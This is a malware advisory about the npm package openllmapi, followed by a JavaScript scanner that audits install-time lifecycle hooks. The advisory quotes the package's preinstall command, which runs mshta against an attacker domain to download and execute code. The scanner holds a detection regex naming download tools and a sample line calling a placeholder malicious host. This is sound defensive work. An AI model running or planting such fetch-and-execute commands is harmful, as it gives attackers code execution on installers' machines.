MAL-2026-6364
Malicious code in openllmapi (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9df5662b44b20595801c25919ac14689b71e89b8c1bdacceedc7ba1e9cf75c41)

The package's preinstall lifecycle script (preinstall.js line 3) runs `cmd /c "mshta http://fixars.top"`, which causes Windows mshta.exe to download and execute an HTML Application from the attacker-controlled domain fixars.top over plain HTTP. This fires automatically on `npm install` and yields arbitrary code execution on the installer's machine with the user's privileges. The package metadata is consistent with a throwaway malicious publish: empty author, no repository or homepage, and a generic description ('Node.js wrapper for OpenLLM API service.') that does not match the install-time behavior.
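A defender-side check for the pattern described above, as an added example that is not code from this advisory or from the package: it audits a package's install-time lifecycle hooks, follows a `node <file>` hook into the referenced file, and reports any line where a download-capable binary is invoked with a URL. The function names, the list of binaries, and the sample package (with a placeholder domain) are assumptions constructed for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// A download-capable binary followed by a URL on the same line.
// The list is illustrative (an assumption of this example), not exhaustive.
const REMOTE_EXEC = /\b(mshta|powershell|pwsh|certutil|bitsadmin|curl|wget)(\.exe)?\b.*?(https?:\/\/[^\s"'`)]+)/i;

// Check one line of text; return a finding fragment or null.
function checkLine(text) {
  const m = REMOTE_EXEC.exec(text);
  if (!m) return null;
  return { tool: m[1].toLowerCase(), url: m[3], plainHttp: m[3].toLowerCase().startsWith('http://') };
}

// manifest: parsed package.json; files: { relativePath: sourceText }.
function auditInstallScripts(manifest, files = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    // 1. The hook command itself may contain the downloader call.
    const direct = checkLine(command);
    if (direct) findings.push({ hook, file: 'package.json', line: null, ...direct });
    // 2. If the hook is `node <file>`, scan that file line by line.
    const target = /^\s*node\s+(?:\.\/)?([^\s]+)/.exec(command);
    const source = target && files[target[1]];
    if (!source) continue;
    source.split(/\r?\n/).forEach((text, i) => {
      const hit = checkLine(text);
      if (hit) findings.push({ hook, file: target[1], line: i + 1, ...hit });
    });
  }
  return findings;
}

// Constructed sample modelled on the advisory's description (placeholder domain).
const sampleManifest = { name: 'example-pkg', version: '1.0.0', scripts: { preinstall: 'node preinstall.js' } };
const sampleFiles = {
  'preinstall.js': [
    "const { execSync } = require('child_process');",
    '// constructed stand-in for the install-time payload',
    'execSync(\'cmd /c "mshta http://malicious.example"\');',
  ].join('\n'),
};

console.log(auditInstallScripts(sampleManifest, sampleFiles));
```

Running the audit against an unpacked tarball (for example one fetched with `npm pack`) inspects the hooks without executing them; installing with `npm install --ignore-scripts` prevents lifecycle scripts from running at all.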
Affected packages
No fixed version published yet for openllmapi (npm). Pin to a known-safe version or switch to an alternative.